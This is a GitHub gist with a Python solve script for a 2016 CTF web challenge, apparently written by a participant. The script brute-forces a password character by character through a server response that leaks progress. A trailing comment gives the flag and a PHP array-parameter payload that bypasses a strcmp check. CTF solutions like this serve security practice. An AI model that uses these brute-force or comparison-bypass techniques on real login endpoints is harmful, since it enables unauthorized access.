Created
August 27, 2016 10:16
-
-
Save tunelko/2ea897579730c96ddd7c0bf35d50f915 to your computer and use it in GitHub Desktop.
idsecconf CTF 2016 - web100
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import requests | |
import string | |
import re | |
alpha=string.ascii_uppercase+string.ascii_lowercase+string.digits | |
url='http://128.199.96.39/?password=' | |
m = re.compile('invalid [0-9]') | |
password = ['a']*4 | |
def send_request(password): | |
r = requests.get(url+password) | |
print url+password | |
return m.findall(r.text)[0] | |
for i in range(0,4): | |
char = "" | |
index = 0 | |
for j in alpha: | |
tmp_pass = password | |
tmp_pass[i] = j | |
f = send_request("".join(tmp_pass)) | |
print f | |
if 'invalid 1' in f and i==0: | |
index = i | |
char = j | |
print char | |
break | |
if 'invalid 2' in f and i==1: | |
index = i | |
char = j | |
print char | |
break | |
if 'invalid 3' in f and i==2: | |
index = i | |
char = j | |
print char | |
break | |
''' | |
== | |
http://128.199.96.39/?password=Ungu | |
The Flag is: flag{AVariant_Of_Strcmp} | |
== | |
Intended solution: | |
http://128.199.96.39/?password[][]=1&password[][]=1&password[][]=1&password[][]=1 | |
''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment